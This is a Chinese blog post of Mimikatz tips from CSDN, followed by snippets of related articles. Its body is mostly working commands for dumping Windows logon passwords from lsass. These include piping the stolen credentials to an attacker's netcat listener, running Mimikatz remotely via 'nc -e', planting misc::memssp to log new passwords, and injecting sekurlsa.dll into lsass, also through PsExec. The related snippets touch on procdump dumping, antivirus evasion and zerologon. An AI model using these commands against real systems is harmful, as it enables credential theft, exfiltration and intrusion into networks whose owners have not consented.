mimakatz用法_Mimikatz 使用小技巧

最新推荐文章于 2024-05-14 04:18:08 发布
最新推荐文章于 2024-05-14 04:18:08 发布
阅读量854 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: mimakatz用法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39722196/article/details/111718071
本文介绍了Mimikatz的多种使用方法,包括记录输出、导入本地文件、传输到远程机器、远程执行等。还针对管理员改密码后Mimikatz抓取老密码的问题,给出了使用misc::memssp、直接logoff等解决办法,同时提及了本机和远程终端的操作命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.记录 Mimikatz输出:

C:>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2.将输出导入到本地文件:

C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

3.将输出传输到远程机器:

Attacker执行:

E:>nc -lvp 4444

Victim执行:

C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444

192.168.52.1 为Attacker IP

4.通过nc远程执行Mimikatz:

Victim执行:

C:>nc -lvp 443

Attacker执行:

E:>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe

192.168.52.128 为Victim IP

若管理员有每过几天就改密码的习惯,但是mimikatz抓取到的密码都是老密码

用QuarksPwDump等抓的hash也是老hash,新密码却抓不到的情况下

可以使用以下方法尝试解决

misc::memssp

记录的结果在c:\windows\system32\mimilsa.log

每次验证都会记录 如 锁屏 等 重启失效

出现如上问题是因为管理一直没注销过,都是直接断开连接,lsass进程里面还吃存放的老的。

也可以直接logoff,但是这样会很明显。

文件

mimikatz.exe、sekurlsa.dll、PsExec.exe(3389)

本机终端

privilege::debug inject::process lsass.exe "绝对路径\sekurlsa.dll" @getLogonPasswords exit

绝对路径\mimikatz.exe < 绝对路径\c.txt > 绝对路径\userpass.txt

———-c.txt———-

privilege::debug inject::process lsass.exe "绝对路径\sekurlsa.dll" @getLogonPasswords exit

————————-

远程终端

psexec.exe -s cmd.exe

绝对路径\mimikatz.exe

privilege::debug inject::process lsass.exe "绝对路径\sekurlsa.dll" @getLogonPasswords exit

Procdump+Mimikatz获取Windows明文密码
SheXinK’s Blog
11-10 2643
Procdump+Mimikatz获取Windows明文密码1 测试环境2 抓取密码 2.1 Server 2008 R2抓取  2.1.1 生成存储文件  2.1.2 mimiakatz密码获取 2.2 Server 2012 R2抓取  2.1.1 修改注册表  2.1.2 mimiakatz密码获取 1 测试环境  系统:   Server 2008 R2   Server 2012 R2 ...
mimakatz用法_两步完成利用procdump64+mimikatz获取win用户密码
weixin_39620943的博客
12-20 452
使用procdump64+mimikatz可实现从内存中获取明文密码工具链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38首先得先获取到内存文件lsass.exe进程,它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样1.导出lsass.exeprocdump64.exe -accepteula -ma lsass.e...
mimakatz用法_使用Mimikatz读取密码
weixin_39966765的博客
12-20 636
法一:https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170813第一条:privilege::debug //提升权限第二条:sekurlsa::logonpasswords //抓取密码注:请以管理员权限!!!(什么?要管理员权限!有管理员权限了还要你干嘛....)法二:meterreter下已集成了mim...
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 8万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
mimikatz将结果输出到一个文本的命令
dda6607的博客
07-30 2596
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt 转载于:https://www.cnblogs.com/ldhbetter/p/9391913.html
mimikatz_trunk-1_mimikatz_
10-03
2. **README.md**:这是标准的Markdown格式的项目说明文件,通常包含项目的简介、安装指南、使用方法以及开发者信息等内容。通过阅读此文件,我们可以深入了解mimikatz的用途、如何运行以及需要注意的事项。 3. **...
ByPass_MIMIkatz
05-26
ByPass_MIMIkatz mimikatz 原版免杀,仅供安全研究 1、删除OR替换源码内相关特征;注释、无用空行等。 2、upx压缩,删除PE里面带upx相关字段。 3、伪造签名。 主要是思路,杀了重新做一份即可免杀 example windows....
利用mimikatz查看rdp连接密码【渗透测试】_mimikatz pth rdp
最新发布
2401_84969443的博客
05-14 1102
szDescription : 本地凭据数据。
mimikatz_trunk2.1.1.zip
08-03
因此,合法使用mimikatz进行安全测试时,必须遵循法律和道德规范,确保不会侵犯他人的隐私或系统安全。 总之,mimikatz_trunk2.1.1.zip提供的是一个历史版本的mimikatz工具,包含多个组件,适用于不同环境的Windows...
技术分享 | mimikatz的常见使用方法
Uguardsec的博客
08-10 3546
0x00简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就
mimikatz.exe windows密码查看
07-12
cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称---------结束进程 process::modules --列出系统的核心模块及所在位置 service::list---------------列出系统的服务 service::remove-----------移除系统的服务 service::start stop 服务名称--启动或停止服务 privilege::list---------------列出权限列表 privilege::enable--------激活一个或多个权限 privilege::debug-----------------提升权限------------------ nogpo::cmd------------打开系统的cmd.exe nogpo::regedit -----------打开系统的注册表 nogpo::taskmgr-------------打开任务管理器 ts::sessions-----------------显示当前的会话 ts::processes------显示进程和对应的pid情况等 sekurlsa::wdigest-----获取本地用户信息及密码 sekurlsa::tspkg------获取tspkg用户信息及密码 sekurlsa::logonPasswords--获登陆用户信息及密码----------------
一键获取windows密码神器mimikatz咪咪猫
07-23
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full""windows密码抓取神器
域控服务器排查命令,mimikatz利用zerologon攻击域控服务器相关命令(附蓝队自查方案)...
weixin_32019361的博客
08-02 1022
0x01 前言mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix官方利用截图如下 mimikatz相关命令lsadump::zerologon /target:dc.hacke.testlab /account:d...
Katz平滑的实现
weixin_42272768的博客
03-08 875
Katz平滑的讲解可参见:https://zhuanlan.zhihu.com/p/100256789。本文是实现了该文章的示例。具体的Katz平滑有时间会把自己的理解写一下。看代码可能会有助于理解文章的内容。 import tensorflow as tf import collections class Katz(): def __init__(self): self.words_uni = collections.defaultdict(int) self.wo
萌新如何玩转mimikatz
m0_71745484的博客
02-13 7739
mimikatz就是我遇见的一个坎
基于Katz维数的改进谱减算法
weixin_70923796的博客
07-31 284
算法考虑到分形维数能够表征语音信号的复杂性,进而能够表征信号中是语音或是噪声占主导的情况,将其运用到谱减算法中,达到了提升算法性能的目的,将会很好地应用于语音增强、语音识别、场景录音等领域。因此,为改善谱减法性能,使其在极低信噪比情况下仍具有鲁棒性,本文将分形维数引入谱减法中,提出了一种新型的利用分形维数改进谱减算法的方法。噪声谱可以通过估计无语音活动期间的平均功率度谱来获得,噪声的相位则可由带噪语音信号的相位来代替,因为语音的相位对语音可懂度的影响很小。...
mimikatz常见命令
G3et的博客
01-29 1897
Mimikatz 是一款用于提取 Windows 系统中用户凭据(例如用户名和密码哈希)的开源工具。它可以在不破坏凭据的情况下轻松访问和使用这些凭据。可以被用于攻击域控制器、服务器和客户端机器,从而获得更多权限并执行恶意操作。
Katz 指标(The Katz Index,KI)的讲解与详细推导
chuhang123的博客
11-28 1万+
Katz 指标可以区分不同的邻居节点不同的影响力。Katz 指标给邻居节点赋予不同的权重, 对于短路径赋予较大的权重, 而长路径赋予较小的权重。 1.两个节点之间的相似度定义为: 其中表示节点x到节点y长度为的路径数量。矩阵A是网络的邻接矩阵。矩阵A的第次幂的每个项等于相应节点对之间长度为l的路径的个数。β 为权重衰减因子,为了保证数列的收敛性, β 的取值须小 于邻接矩阵 A 最大特征值...
mimikatz使用详解
qq_59468567的博客
04-12 1196
该模块是用于提权的模块,很多模块需要高权限运行,所以要先进行提权,只能用具有管理员权限的命令行窗口才可以执行成功,普通用户使用提权命令会失败。其中常用的是privilege、sekurlsa、kerberos、lsadump、token、sid模块。改模块是对Local Security Authiruty(LSA)进行密码抓取的模块。使用该模块需要高权限,因此需要执行提权命令,如下是常用命令。该模块是与Kerberos相关的模块。• privilege 提权模块。• kerberos包模块。
使用mimikatz_trunk轻松查看区域密码
资源摘要信息:"mimikatz是一个在Windows操作系统上使用的开源工具,主要用于提取在内存中的明文密码、哈希值、PIN码和Kerberos票据等。它的名称来源于法语中的'密码'(mot de passe)一词。mimikatz是安全研究员和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值